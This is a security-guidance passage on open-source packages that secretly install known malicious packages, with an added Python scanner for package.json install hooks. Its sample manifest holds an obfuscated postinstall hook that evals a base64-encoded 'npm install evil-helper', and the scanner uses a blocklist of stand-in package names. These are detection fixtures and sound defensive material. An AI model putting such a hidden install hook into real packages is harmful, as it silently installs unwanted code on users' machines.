Malicious import

Background

An open-source package that attempts to install a known malicious package is a software component or library that, when executed or included in a software project, downloads and installs another package already recognized as malicious or harmful. This behaviour may be intentional on the part of the package author, or it may result from compromised or unauthorized modifications to the package's code or dependencies.

Problem

Malicious actors may conceal the true intent of the open-source package by obfuscating or disguising the code that initiates the installation of the malicious package, for example by encoding the install command so that it does not appear in plain text.
Installing known malicious packages exposes users and organizations to significant security risks, including malware, data breaches, financial losses, reputational damage, and legal liability.
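As an added illustration of the behaviour described in the Background and Problem sections (example code, not tooling from the original page): a small Python scanner that inspects an npm-style package.json for install-time lifecycle hooks that pull in additional packages, decodes base64 blobs found in those hooks so that a simply obfuscated install command is still seen, and checks declared dependencies against a blocklist. The manifest, the package names (harmless-looking-lib, evil-helper, totally-legit-utils) and the blocklist are all constructed for the example; the hook names preinstall, install, postinstall and prepare are real npm lifecycle scripts.

```python
"""Scan an npm-style package.json for install-time code that installs other packages.

Added illustration for this page, not tooling from the original text. It assumes
an npm package.json layout; the manifest and the blocklist below are constructed.
"""
import base64
import json
import re

# Constructed blocklist. A real scanner would consult a curated
# malicious-package feed rather than a hard-coded set.
KNOWN_MALICIOUS = {"evil-helper", "totally-legit-utils"}

# Lifecycle scripts that npm runs automatically when a package is installed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Commands that fetch or install additional packages at install time.
INSTALLER_RE = re.compile(
    r"\b(npm\s+(i|install|add)|yarn\s+add|pnpm\s+(add|install)"
    r"|pip3?\s+install|curl\b|wget\b)\b"
)

# Runs of base64 characters long enough to hide a command.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _decode_b64_blobs(text):
    """Yield printable UTF-8 decodings of base64 blobs embedded in a script."""
    for match in B64_RE.finditer(text):
        try:
            decoded = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            yield decoded


def scan_manifest(manifest):
    """Return (location, reason, evidence) findings for a parsed package.json dict."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        # Look at the raw command and at anything it hides in base64.
        for text in [cmd, *_decode_b64_blobs(cmd)]:
            if INSTALLER_RE.search(text):
                findings.append((hook, "installs additional packages at install time", text))
            for name in KNOWN_MALICIOUS:
                if name in text:
                    findings.append((hook, f"references known malicious package {name}", text))
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name in manifest.get(section, {}):
            if name in KNOWN_MALICIOUS:
                findings.append((section, f"depends on known malicious package {name}", name))
    return findings


def scan_manifest_text(text):
    """Convenience wrapper for a package.json read from disk or a registry tarball."""
    return scan_manifest(json.loads(text))


# Constructed manifest: the postinstall hook hides "npm install evil-helper"
# inside a base64 blob, and one declared dependency is on the blocklist.
SAMPLE_MANIFEST = {
    "name": "harmless-looking-lib",
    "version": "1.0.0",
    "scripts": {
        "postinstall": "node -e \"eval(Buffer.from("
                       "'bnBtIGluc3RhbGwgZXZpbC1oZWxwZXI=','base64').toString())\"",
        "test": "mocha",
    },
    "dependencies": {"lodash": "^4.17.21", "totally-legit-utils": "0.0.3"},
}

if __name__ == "__main__":
    for location, reason, evidence in scan_manifest(SAMPLE_MANIFEST):
        print(f"[{location}] {reason}: {evidence}")
```

On the sample manifest the raw postinstall command contains no installer keyword, so only the decoded view triggers the first two findings; the third comes from the dependency list. Decoding is deliberately shallow (one layer of base64, printable output only): the point is to catch the common disguise the Problem section describes, not to replace a full dynamic analysis of install hooks.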

Remediation

Remove the package from your dependency list, disconnect affected devices from the network, and report the incident to the relevant authorities in your organization.

See